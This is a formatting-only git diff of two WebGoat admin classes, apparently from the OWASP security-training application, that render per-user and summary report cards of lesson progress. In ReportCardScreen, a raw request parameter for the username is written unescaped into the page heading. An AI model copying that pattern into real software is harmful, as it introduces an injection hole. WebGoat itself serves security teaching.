+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
- * @author     Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
- * @created    October 28, 2003
+ * 
+ * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * @created October 28, 2003
  */
 public class ReportCardScreen extends LessonAdapter
 {
 
-    /**
-     *  Description of the Field
-     */
-    protected final static String USERNAME = "Username";
+	/**
+	 * Description of the Field
+	 */
+	protected final static String USERNAME = "Username";
 
-
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     * @return    Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-	ElementContainer ec = new ElementContainer();
-
-	String user = null;
-
-	try
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected Element createContent(WebSession s)
 	{
-	    if (s.getRequest().isUserInRole(WebSession.WEBGOAT_ADMIN))
-	    {
-		user = s.getParser().getRawParameter(USERNAME);
-	    }
-	    else
-	    {
-		user = s.getUserName();
-	    }
-	}
-	catch (Exception e)
-	{}
+		ElementContainer ec = new ElementContainer();
 
-	if (user == null)
-	{
-	    user = s.getUserName();
+		String user = null;
+
+		try
+		{
+			if (s.getRequest().isUserInRole(WebSession.WEBGOAT_ADMIN))
+			{
+				user = s.getParser().getRawParameter(USERNAME);
+			}
+			else
+			{
+				user = s.getUserName();
+			}
+		} catch (Exception e)
+		{
+		}
+
+		if (user == null)
+		{
+			user = s.getUserName();
+		}
+
+		ec.addElement(makeFeedback(s));
+		ec.addElement(makeReportCard(s, user));
+
+		return ec;
 	}
 
-	ec.addElement(makeFeedback(s));
-	ec.addElement(makeReportCard(s, user));
-
-	return ec;
-    }
-
-
-    private Element makeFeedback(WebSession s)
-    {
-	ElementContainer ec = new ElementContainer();
-	ec.addElement(new Center(new StringElement(
-		"Comments and suggestions are welcome. "
-			+ getWebgoatContext().getFeedbackAddress())));
-
-	return ec;
-    }
-
-
-    /**
-     *  Gets the category attribute of the UserAdminScreen object
-     *
-     * @return    The category value
-     */
-    protected Category getDefaultCategory()
-    {
-	return Category.ADMIN_FUNCTIONS;
-    }
-
-    private final static Integer DEFAULT_RANKING = new Integer(1000);
-
-
-    protected Integer getDefaultRanking()
-    {
-	return DEFAULT_RANKING;
-    }
-
-
-    /**
-     *  Gets the role attribute of the UserAdminScreen object
-     *
-     * @return    The role value
-     */
-    public String getRole()
-    {
-	return USER_ROLE;
-    }
-
-
-    /**
-     *  Gets the title attribute of the UserAdminScreen object
-     *
-     * @return    The title value
-     */
-    public String getTitle()
-    {
-	return ("Report Card");
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     * @param  screen  Description of the Parameter
-     * @param  s       Description of the Parameter
-     * @param  user    Description of the Parameter
-     * @return         Description of the Return Value
-     */
-    private TR makeLessonRow(WebSession s, String user, Screen screen)
-    {
-	LessonTracker lessonTracker = UserTracker.instance().getLessonTracker(
-		s, user, screen);
-	TR tr = new TR();
-	if (lessonTracker.getCompleted())
+	private Element makeFeedback(WebSession s)
 	{
-	    tr.setBgColor(HtmlColor.LIGHTGREEN);
-	}
-	else if (lessonTracker.getNumVisits() == 0)
-	{
-	    tr.setBgColor(HtmlColor.LIGHTBLUE);
-	}
-	else if (!lessonTracker.getCompleted()
-		&& lessonTracker.getNumVisits() > 10)
-	{
-	    tr.setBgColor(HtmlColor.RED);
-	}
-	else
-	{
-	    tr.setBgColor(HtmlColor.YELLOW);
-	}
-	tr.addElement(new TD().addElement(screen.getTitle()));
-	tr.addElement(new TD().setAlign("CENTER").addElement(
-		lessonTracker.getCompleted() ? "Y" : "N"));
-	tr.addElement(new TD().setAlign("CENTER").addElement(
-		Integer.toString(lessonTracker.getNumVisits())));
-	tr.addElement(new TD().setAlign("CENTER").addElement(
-		Integer.toString(lessonTracker.getMaxHintLevel())));
-	tr.addElement(new TD().setAlign("CENTER").addElement(
-		lessonTracker.getViewedCookies() ? "Y" : "N"));
-	tr.addElement(new TD().setAlign("CENTER").addElement(
-		lessonTracker.getViewedHtml() ? "Y" : "N"));
-	tr.addElement(new TD().setAlign("CENTER").addElement(
-		lessonTracker.getViewedLessonPlan() ? "Y" : "N"));
-	tr.addElement(new TD().setAlign("CENTER").addElement(
-		lessonTracker.getViewedParameters() ? "Y" : "N"));
-	tr.addElement(new TD().setAlign("CENTER").addElement(
-		lessonTracker.getViewedSource() ? "Y" : "N"));
-	return tr;
-    }
+		ElementContainer ec = new ElementContainer();
+		ec.addElement(new Center(new StringElement("Comments and suggestions are welcome. "
+				+ getWebgoatContext().getFeedbackAddress())));
 
-
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     * @return    Description of the Return Value
-     */
-    protected Element makeMessages(WebSession s)
-    {
-	ElementContainer ec = new ElementContainer();
-
-	return (ec);
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     * @param  s     Description of the Parameter
-     * @param  user  Description of the Parameter
-     * @return       Description of the Return Value
-     */
-    public Element makeReportCard(WebSession s, String user)
-    {
-	ElementContainer ec = new ElementContainer();
-
-	ec.addElement(makeUser(s, user));
-	Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1);
-
-	if (s.isColor())
-	{
-	    t.setBorder(1);
-	}
-	TR tr = new TR();
-	t.addElement(makeUserHeaderRow());
-
-	// These are all the user lesson
-	tr = new TR();
-	tr.addElement(new TD().setAlign("CENTER").setColSpan(9).addElement(
-		"Normal user lessons"));
-	t.addElement(tr);
-	for (Iterator lessonIter = s.getCourse().getLessons(s,
-		AbstractLesson.USER_ROLE).iterator(); lessonIter.hasNext();)
-	{
-	    Screen screen = (Screen) lessonIter.next();
-	    t.addElement(makeLessonRow(s, user, screen));
+		return ec;
 	}
 
-	// The user figured out there was a hackable admin acocunt
-	tr = new TR();
-	tr.addElement(new TD().setAlign("CENTER").setColSpan(9).addElement(
-		"Hackable Admin Screens"));
-	t.addElement(tr);
-	for (Iterator lessonIter = s.getCourse().getLessons(s,
-		AbstractLesson.HACKED_ADMIN_ROLE).iterator(); lessonIter
-		.hasNext();)
+	/**
+	 * Gets the category attribute of the UserAdminScreen object
+	 * 
+	 * @return The category value
+	 */
+	protected Category getDefaultCategory()
 	{
-	    Screen screen = (Screen) lessonIter.next();
-	    t.addElement(makeLessonRow(s, user, screen));
+		return Category.ADMIN_FUNCTIONS;
 	}
 
-	// The user figured out how to actually hack the admin acocunt
-	tr = new TR();
-	tr.addElement(new TD().setAlign("CENTER").setColSpan(9).addElement(
-		"Actual Admin Screens"));
-	t.addElement(tr);
-	for (Iterator lessonIter = s.getCourse().getLessons(s,
-		AbstractLesson.ADMIN_ROLE).iterator(); lessonIter.hasNext();)
+	private final static Integer DEFAULT_RANKING = new Integer(1000);
+
+	protected Integer getDefaultRanking()
 	{
-	    Screen screen = (Screen) lessonIter.next();
-	    t.addElement(makeLessonRow(s, user, screen));
+		return DEFAULT_RANKING;
 	}
 
-	ec.addElement(t);
-	return (ec);
-    }
+	/**
+	 * Gets the role attribute of the UserAdminScreen object
+	 * 
+	 * @return The role value
+	 */
+	public String getRole()
+	{
+		return USER_ROLE;
+	}
 
+	/**
+	 * Gets the title attribute of the UserAdminScreen object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return ("Report Card");
+	}
 
-    /**
-     *  Description of the Method
-     *
-     * @param  s     Description of the Parameter
-     * @param  user  Description of the Parameter
-     * @return       Description of the Return Value
-     */
-    protected Element makeUser(WebSession s, String user)
-    {
-	H2 h2 = new H2();
-	// FIXME: The session is the current session, not the session of the user we are reporting.
-	//String type = s.isAdmin() ? " [Administrative User]" : s.isHackedAdmin() ? " [Normal User - Hacked Admin Access]" : " [Normal User]";
-	String type = "";
-	h2.addElement(new StringElement("Results for: " + user + type));
-	return h2;
-    }
+	/**
+	 * Description of the Method
+	 * 
+	 * @param screen
+	 *            Description of the Parameter
+	 * @param s
+	 *            Description of the Parameter
+	 * @param user
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	private TR makeLessonRow(WebSession s, String user, Screen screen)
+	{
+		LessonTracker lessonTracker = UserTracker.instance().getLessonTracker(s, user, screen);
+		TR tr = new TR();
+		if (lessonTracker.getCompleted())
+		{
+			tr.setBgColor(HtmlColor.LIGHTGREEN);
+		}
+		else if (lessonTracker.getNumVisits() == 0)
+		{
+			tr.setBgColor(HtmlColor.LIGHTBLUE);
+		}
+		else if (!lessonTracker.getCompleted() && lessonTracker.getNumVisits() > 10)
+		{
+			tr.setBgColor(HtmlColor.RED);
+		}
+		else
+		{
+			tr.setBgColor(HtmlColor.YELLOW);
+		}
+		tr.addElement(new TD().addElement(screen.getTitle()));
+		tr.addElement(new TD().setAlign("CENTER").addElement(lessonTracker.getCompleted() ? "Y" : "N"));
+		tr.addElement(new TD().setAlign("CENTER").addElement(Integer.toString(lessonTracker.getNumVisits())));
+		tr.addElement(new TD().setAlign("CENTER").addElement(Integer.toString(lessonTracker.getMaxHintLevel())));
+		tr.addElement(new TD().setAlign("CENTER").addElement(lessonTracker.getViewedCookies() ? "Y" : "N"));
+		tr.addElement(new TD().setAlign("CENTER").addElement(lessonTracker.getViewedHtml() ? "Y" : "N"));
+		tr.addElement(new TD().setAlign("CENTER").addElement(lessonTracker.getViewedLessonPlan() ? "Y" : "N"));
+		tr.addElement(new TD().setAlign("CENTER").addElement(lessonTracker.getViewedParameters() ? "Y" : "N"));
+		tr.addElement(new TD().setAlign("CENTER").addElement(lessonTracker.getViewedSource() ? "Y" : "N"));
+		return tr;
+	}
 
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected Element makeMessages(WebSession s)
+	{
+		ElementContainer ec = new ElementContainer();
 
-    /**
-     *  Description of the Method
-     *
-     * @return    Description of the Return Value
-     */
-    private TR makeUserHeaderRow()
-    {
-	TR tr = new TR();
+		return (ec);
+	}
 
-	tr.addElement(new TH("Lesson"));
-	tr.addElement(new TH("Complete"));
-	tr.addElement(new TH("Visits"));
-	tr.addElement(new TH("Hints"));
-	tr.addElement(new TH("Cookies"));
-	tr.addElement(new TH("HTML"));
-	tr.addElement(new TH("LessonPlan"));
-	tr.addElement(new TH("Parameters"));
-	tr.addElement(new TH("Source"));
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @param user
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	public Element makeReportCard(WebSession s, String user)
+	{
+		ElementContainer ec = new ElementContainer();
 
-	return tr;
-    }
+		ec.addElement(makeUser(s, user));
+		Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1);
+
+		if (s.isColor())
+		{
+			t.setBorder(1);
+		}
+		TR tr = new TR();
+		t.addElement(makeUserHeaderRow());
+
+		// These are all the user lesson
+		tr = new TR();
+		tr.addElement(new TD().setAlign("CENTER").setColSpan(9).addElement("Normal user lessons"));
+		t.addElement(tr);
+		for (Iterator lessonIter = s.getCourse().getLessons(s, AbstractLesson.USER_ROLE).iterator(); lessonIter
+				.hasNext();)
+		{
+			Screen screen = (Screen) lessonIter.next();
+			t.addElement(makeLessonRow(s, user, screen));
+		}
+
+		// The user figured out there was a hackable admin acocunt
+		tr = new TR();
+		tr.addElement(new TD().setAlign("CENTER").setColSpan(9).addElement("Hackable Admin Screens"));
+		t.addElement(tr);
+		for (Iterator lessonIter = s.getCourse().getLessons(s, AbstractLesson.HACKED_ADMIN_ROLE).iterator(); lessonIter
+				.hasNext();)
+		{
+			Screen screen = (Screen) lessonIter.next();
+			t.addElement(makeLessonRow(s, user, screen));
+		}
+
+		// The user figured out how to actually hack the admin acocunt
+		tr = new TR();
+		tr.addElement(new TD().setAlign("CENTER").setColSpan(9).addElement("Actual Admin Screens"));
+		t.addElement(tr);
+		for (Iterator lessonIter = s.getCourse().getLessons(s, AbstractLesson.ADMIN_ROLE).iterator(); lessonIter
+				.hasNext();)
+		{
+			Screen screen = (Screen) lessonIter.next();
+			t.addElement(makeLessonRow(s, user, screen));
+		}
+
+		ec.addElement(t);
+		return (ec);
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @param user
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected Element makeUser(WebSession s, String user)
+	{
+		H2 h2 = new H2();
+		// FIXME: The session is the current session, not the session of the user we are reporting.
+		// String type = s.isAdmin() ? " [Administrative User]" : s.isHackedAdmin() ? " [Normal User
+		// - Hacked Admin
+		// Access]" : " [Normal User]";
+		String type = "";
+		h2.addElement(new StringElement("Results for: " + user + type));
+		return h2;
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @return Description of the Return Value
+	 */
+	private TR makeUserHeaderRow()
+	{
+		TR tr = new TR();
+
+		tr.addElement(new TH("Lesson"));
+		tr.addElement(new TH("Complete"));
+		tr.addElement(new TH("Visits"));
+		tr.addElement(new TH("Hints"));
+		tr.addElement(new TH("Cookies"));
+		tr.addElement(new TH("HTML"));
+		tr.addElement(new TH("LessonPlan"));
+		tr.addElement(new TH("Parameters"));
+		tr.addElement(new TH("Source"));
+
+		return tr;
+	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/admin/SummaryReportCardScreen.java b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/SummaryReportCardScreen.java
index 1747a5ff0..075a1d597 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/admin/SummaryReportCardScreen.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/SummaryReportCardScreen.java
@@ -1,8 +1,8 @@
+
 package org.owasp.webgoat.lessons.admin;
 
 import java.util.Enumeration;
 import java.util.Iterator;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.HtmlColor;
@@ -21,317 +21,294 @@ import org.owasp.webgoat.session.Screen;
 import org.owasp.webgoat.session.UserTracker;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
- * @author     Bruce mayhew <a href="http://code.google.com">WebGoat</a>
- * @created    October 28, 2003
+ * 
+ * @author Bruce mayhew <a href="http://code.google.com">WebGoat</a>
+ * @created October 28, 2003
  */
 public class SummaryReportCardScreen extends LessonAdapter
 {
 
-    private int totalUsersNormalComplete = 0;
+	private int totalUsersNormalComplete = 0;
 
-    private int totalUsersAdminComplete = 0;
+	private int totalUsersAdminComplete = 0;
 
-
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     * @return    Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-	ElementContainer ec = new ElementContainer();
-
-	String selectedUser = null;
-
-	try
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected Element createContent(WebSession s)
 	{
-	    if (s.getRequest().isUserInRole(WebSession.WEBGOAT_ADMIN))
-	    {
-		Enumeration e = s.getParser().getParameterNames();
+		ElementContainer ec = new ElementContainer();
 
-		while (e.hasMoreElements())
+		String selectedUser = null;
+
+		try
 		{
-		    String key = (String) e.nextElement();
-		    if (key.startsWith("View_"))
-		    {
-			selectedUser = key.substring("View_".length());
-			ReportCardScreen reportCard = new ReportCardScreen();
-			return reportCard.makeReportCard(s, selectedUser);
-		    }
-		    if (key.startsWith("Delete_"))
-		    {
-			selectedUser = key.substring("Delete_".length());
-			deleteUser(selectedUser);
-		    }
+			if (s.getRequest().isUserInRole(WebSession.WEBGOAT_ADMIN))
+			{
+				Enumeration e = s.getParser().getParameterNames();
+
+				while (e.hasMoreElements())
+				{
+					String key = (String) e.nextElement();
+					if (key.startsWith("View_"))
+					{
+						selectedUser = key.substring("View_".length());
+						ReportCardScreen reportCard = new ReportCardScreen();
+						return reportCard.makeReportCard(s, selectedUser);
+					}
+					if (key.startsWith("Delete_"))
+					{
+						selectedUser = key.substring("Delete_".length());
+						deleteUser(selectedUser);
+					}
+				}
+			}
+		} catch (Exception e)
+		{
+			e.printStackTrace();
 		}
-	    }
+
+		ec.addElement(new Center().addElement(makeSummary(s)));
+
+		ec.addElement(new P());
+
+		Table t = new Table().setCellSpacing(0).setCellPadding(4).setBorder(1).setWidth("100%");
+		if (s.isColor())
+		{
+			t.setBorder(1);
+		}
+		t.addElement(makeUserSummaryHeader());
+
+		for (Iterator<String> userIter = UserTracker.instance().getAllUsers(WebSession.WEBGOAT_USER).iterator(); userIter
+				.hasNext();)
+		{
+
+			String user = userIter.next();
+			t.addElement(makeUserSummaryRow(s, user));
+		}
+
+		ec.addElement(new Center().addElement(t));
+
+		return ec;
 	}
-	catch (Exception e)
+
+	protected Element makeSummary(WebSession s)
 	{
-	    e.printStackTrace();
+		Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("100%");
+		if (s.isColor())
+		{
+			t.setBorder(1);
+		}
+		TR tr = new TR();
+		// tr.addElement( new TH().addElement( "Summary").setColSpan(1));
+		// t.addElement( tr );
+
+		tr = new TR();
+		tr.addElement(new TD().setWidth("60%").addElement("Total number of users"));
+		tr.addElement(new TD().setAlign("LEFT").addElement(
+															Integer.toString(UserTracker.instance()
+																	.getAllUsers(WebSession.WEBGOAT_USER).size())));
+		t.addElement(tr);
+
+		tr = new TR();
+		tr.addElement(new TD().setWidth("60%").addElement("Total number of users that completed all normal lessons"));
+		tr.addElement(new TD().setAlign("LEFT").addElement(Integer.toString(totalUsersNormalComplete)));
+		t.addElement(tr);
+
+		tr = new TR();
+		tr.addElement(new TD().setWidth("60%").addElement("Total number of users that completed all admin lessons"));
+		tr.addElement(new TD().setAlign("LEFT").addElement(Integer.toString(totalUsersAdminComplete)));
+		t.addElement(tr);
+		return t;
 	}
 
-	ec.addElement(new Center().addElement(makeSummary(s)));
-
-	ec.addElement(new P());
-
-	Table t = new Table().setCellSpacing(0).setCellPadding(4).setBorder(1)
-		.setWidth("100%");
-	if (s.isColor())
+	private void deleteUser(String user)
 	{
-	    t.setBorder(1);
+		UserTracker.instance().deleteUser(user);
 	}
-	t.addElement(makeUserSummaryHeader());
 
-	for (Iterator<String> userIter = UserTracker.instance().getAllUsers(
-		WebSession.WEBGOAT_USER).iterator(); userIter.hasNext();)
+	/**
+	 * Gets the category attribute of the UserAdminScreen object
+	 * 
+	 * @return The category value
+	 */
+	protected Category getDefaultCategory()
 	{
-
-	    String user = userIter.next();
-	    t.addElement(makeUserSummaryRow(s, user));
+		return Category.ADMIN_FUNCTIONS;
 	}
 
-	ec.addElement(new Center().addElement(t));
+	private final static Integer DEFAULT_RANKING = new Integer(1000);
 
-	return ec;
-    }
-
-
-    protected Element makeSummary(WebSession s)
-    {
-	Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0)
-		.setWidth("100%");
-	if (s.isColor())
+	protected Integer getDefaultRanking()
 	{
-	    t.setBorder(1);
+		return DEFAULT_RANKING;
 	}
-	TR tr = new TR();
-	//tr.addElement( new TH().addElement( "Summary").setColSpan(1));
-	//t.addElement( tr );
 
-	tr = new TR();
-	tr.addElement(new TD().setWidth("60%").addElement(
-		"Total number of users"));
-	tr.addElement(new TD().setAlign("LEFT").addElement(
-		Integer.toString(UserTracker.instance().getAllUsers(
-			WebSession.WEBGOAT_USER).size())));
-	t.addElement(tr);
-
-	tr = new TR();
-	tr.addElement(new TD().setWidth("60%").addElement(
-		"Total number of users that completed all normal lessons"));
-	tr.addElement(new TD().setAlign("LEFT").addElement(
-		Integer.toString(totalUsersNormalComplete)));
-	t.addElement(tr);
-
-	tr = new TR();
-	tr.addElement(new TD().setWidth("60%").addElement(
-		"Total number of users that completed all admin lessons"));
-	tr.addElement(new TD().setAlign("LEFT").addElement(
-		Integer.toString(totalUsersAdminComplete)));
-	t.addElement(tr);
-	return t;
-    }
-
-
-    private void deleteUser(String user)
-    {
-	UserTracker.instance().deleteUser(user);
-    }
-
-
-    /**
-     *  Gets the category attribute of the UserAdminScreen object
-     *
-     * @return    The category value
-     */
-    protected Category getDefaultCategory()
-    {
-	return Category.ADMIN_FUNCTIONS;
-    }
-
-    private final static Integer DEFAULT_RANKING = new Integer(1000);
-
-
-    protected Integer getDefaultRanking()
-    {
-	return DEFAULT_RANKING;
-    }
-
-
-    /**
-     *  Gets the role attribute of the UserAdminScreen object
-     *
-     * @return    The role value
-     */
-    public String getRole()
-    {
-	return ADMIN_ROLE;
-    }
-
-
-    /**
-     *  Gets the title attribute of the UserAdminScreen object
-     *
-     * @return    The title value
-     */
-    public String getTitle()
-    {
-	return ("Summary Report Card");
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     * @return    Description of the Return Value
-     */
-    protected Element makeMessages(WebSession s)
-    {
-	ElementContainer ec = new ElementContainer();
-
-	return (ec);
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     * @return    Description of the Return Value
-     */
-    protected Element makeUserSummaryHeader()
-    {
-	TR tr = new TR();
-
-	tr.addElement(new TH("User Name"));
-	tr.addElement(new TH("Normal Complete"));
-	tr.addElement(new TH("Admin Complete"));
-	tr.addElement(new TH("View"));
-	tr.addElement(new TH("Delete"));
-
-	return tr;
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     * @param  s     Description of the Parameter
-     * @param  user  Description of the Parameter
-     * @return       Description of the Return Value
-     */
-    protected Element makeUserSummaryRow(WebSession s, String user)
-    {
-	TR tr = new TR();
-
-	tr.addElement(new TD().setAlign("LEFT").addElement(user));
-	int lessonCount = 0;
-	int passedCount = 0;
-	boolean normalComplete = false;
-	boolean adminComplete = false;
-
-	for (Iterator lessonIter = s.getCourse().getLessons(s,
-		AbstractLesson.USER_ROLE).iterator(); lessonIter.hasNext();)
+	/**
+	 * Gets the role attribute of the UserAdminScreen object
+	 * 
+	 * @return The role value
+	 */
+	public String getRole()
 	{
-	    lessonCount++;
-	    Screen screen = (Screen) lessonIter.next();
-
-	    LessonTracker lessonTracker = UserTracker.instance()
-		    .getLessonTracker(s, user, screen);
-	    if (lessonTracker.getCompleted())
-	    {
-		passedCount++;
-	    }
+		return ADMIN_ROLE;
 	}
-	if (lessonCount == passedCount)
+
+	/**
+	 * Gets the title attribute of the UserAdminScreen object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
 	{
-	    normalComplete = true;
-	    totalUsersNormalComplete++;
+		return ("Summary Report Card");
 	}
-	String text = Integer.toString(passedCount) + " of "
-		+ Integer.toString(lessonCount);
-	tr.addElement(new TD().setAlign("CENTER").addElement(text));
 
-	lessonCount = 0;
-	passedCount = 0;
-	for (Iterator lessonIter = s.getCourse().getLessons(s,
-		AbstractLesson.HACKED_ADMIN_ROLE).iterator(); lessonIter
-		.hasNext();)
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected Element makeMessages(WebSession s)
 	{
-	    lessonCount++;
-	    Screen screen = (Screen) lessonIter.next();
+		ElementContainer ec = new ElementContainer();
 
-	    LessonTracker lessonTracker = UserTracker.instance()
-		    .getLessonTracker(s, user, screen);
-	    if (lessonTracker.getCompleted())
-	    {
-		passedCount++;
-	    }
+		return (ec);
 	}
-	if (lessonCount == passedCount)
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @return Description of the Return Value
+	 */
+	protected Element makeUserSummaryHeader()
 	{
-	    adminComplete = true;
-	    totalUsersAdminComplete++;
+		TR tr = new TR();
+
+		tr.addElement(new TH("User Name"));
+		tr.addElement(new TH("Normal Complete"));
+		tr.addElement(new TH("Admin Complete"));
+		tr.addElement(new TH("View"));
+		tr.addElement(new TH("Delete"));
+
+		return tr;
 	}
-	text = Integer.toString(passedCount) + " of "
-		+ Integer.toString(lessonCount);
-	tr.addElement(new TD().setAlign("CENTER").addElement(text));
 
-	tr.addElement(new TD().setAlign("CENTER").addElement(
-		new Input(Input.SUBMIT, "View_" + user, "View")));
-	tr.addElement(new TD().setAlign("CENTER").addElement(
-		new Input(Input.SUBMIT, "Delete_" + user, "Delete")));
-
-	if (normalComplete && adminComplete)
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @param user
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected Element makeUserSummaryRow(WebSession s, String user)
 	{
-	    tr.setBgColor(HtmlColor.GREEN);
+		TR tr = new TR();
+
+		tr.addElement(new TD().setAlign("LEFT").addElement(user));
+		int lessonCount = 0;
+		int passedCount = 0;
+		boolean normalComplete = false;
+		boolean adminComplete = false;
+
+		for (Iterator lessonIter = s.getCourse().getLessons(s, AbstractLesson.USER_ROLE).iterator(); lessonIter
+				.hasNext();)
+		{
+			lessonCount++;
+			Screen screen = (Screen) lessonIter.next();
+
+			LessonTracker lessonTracker = UserTracker.instance().getLessonTracker(s, user, screen);
+			if (lessonTracker.getCompleted())
+			{
+				passedCount++;
+			}
+		}
+		if (lessonCount == passedCount)
+		{
+			normalComplete = true;
+			totalUsersNormalComplete++;
+		}
+		String text = Integer.toString(passedCount) + " of " + Integer.toString(lessonCount);
+		tr.addElement(new TD().setAlign("CENTER").addElement(text));
+
+		lessonCount = 0;
+		passedCount = 0;
+		for (Iterator lessonIter = s.getCourse().getLessons(s, AbstractLesson.HACKED_ADMIN_ROLE).iterator(); lessonIter
+				.hasNext();)
+		{
+			lessonCount++;
+			Screen screen = (Screen) lessonIter.next();
+
+			LessonTracker lessonTracker = UserTracker.instance().getLessonTracker(s, user, screen);
+			if (lessonTracker.getCompleted())
+			{
+				passedCount++;
+			}
+		}
+		if (lessonCount == passedCount)
+		{
+			adminComplete = true;
+			totalUsersAdminComplete++;
+		}
+		text = Integer.toString(passedCount) + " of " + Integer.toString(lessonCount);
+		tr.addElement(new TD().setAlign("CENTER").addElement(text));
+
+		tr.addElement(new TD().setAlign("CENTER").addElement(new Input(Input.SUBMIT, "View_" + user, "View")));
+		tr.addElement(new TD().setAlign("CENTER").addElement(new Input(Input.SUBMIT, "Delete_" + user, "Delete")));
+
+		if (normalComplete && adminComplete)
+		{
+			tr.setBgColor(HtmlColor.GREEN);
+		}
+		else if (normalComplete)
+		{
+			tr.setBgColor(HtmlColor.LIGHTGREEN);
+		}
+		else
+		{
+			tr.setBgColor(HtmlColor.LIGHTBLUE);
+		}
+
+		return (tr);
 	}
-	else if (normalComplete)
+
+	public boolean isEnterprise()
 	{
-	    tr.setBgColor(HtmlColor.LIGHTGREEN);
+		return true;
 	}
-	else
-	{
-	    tr.setBgColor(HtmlColor.LIGHTBLUE);
-	}
-
-	return (tr);
-    }
-
-
-    public boolean isEnterprise()
-    {
-	return true;
-    }
 }
